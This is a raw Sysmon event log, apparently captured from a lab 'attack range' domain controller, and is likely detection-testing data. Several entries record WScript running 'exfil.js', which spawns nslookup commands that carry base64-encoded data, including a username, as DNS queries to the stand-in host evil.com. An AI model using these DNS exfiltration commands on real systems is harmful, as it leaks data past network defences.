14:21:27.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.640{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0B43-000000005F02}7960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.640{2E1864BB-18E7-629A-0943-000000005F02}4712884C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-0B43-000000005F02}7960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.652{2E1864BB-18E7-629A-0B43-000000005F02}7960C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-0943-000000005F02}4712C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldqnun.tmp 2>&1 23542300x8000000000000000207460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.640{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD887345B729DC6DB04065C1B6E0B0F9,SHA256=24DB9A1FACA6739EB24FD7466792B0ECBCABDFD54B3F730B4B1247138E7035BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.624{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0A43-000000005F02}4556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.624{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0A43-000000005F02}4556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.624{2E1864BB-18E7-629A-0A43-000000005F02}45565932C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0943-000000005F02}4712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.624{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0A43-000000005F02}4556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0943-000000005F02}4712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-18E0-629A-6742-000000005F02}39761104C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-0943-000000005F02}4712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.620{2E1864BB-18E7-629A-0943-000000005F02}4712C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldqnun.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.609{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqyqp.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.593{2E1864BB-18E7-629A-0743-000000005F02}47685152C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0843-000000005F02}3504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.577{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0843-000000005F02}3504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.577{2E1864BB-18E7-629A-0643-000000005F02}49325048C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-0843-000000005F02}3504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.591{2E1864BB-18E7-629A-0843-000000005F02}3504C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-0643-000000005F02}4932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqyqp.tmp 2>&1 354300x8000000000000000207439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{00000000-0000-0000-0000-000000000000}5704<unknown process>-udpfalsefalse127.0.0.1-50499-false127.0.0.1-53domain 354300x8000000000000000207438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{00000000-0000-0000-0000-000000000000}5704<unknown process>-udptruefalse127.0.0.1-50499-false127.0.0.1-53domain 354300x8000000000000000207437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{00000000-0000-0000-0000-000000000000}5704<unknown process>-udpfalsefalse127.0.0.1-50498-false127.0.0.1-53domain 354300x8000000000000000207436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{00000000-0000-0000-0000-000000000000}5704<unknown process>-udpfalsefalse127.0.0.1-50497-false127.0.0.1-53domain 354300x8000000000000000207435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.158{00000000-0000-0000-0000-000000000000}5704<unknown process>-udptruefalse127.0.0.1-50497-false127.0.0.1-53domain 10341000x8000000000000000207434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.555{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0743-000000005F02}4768C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.555{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0743-000000005F02}4768C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 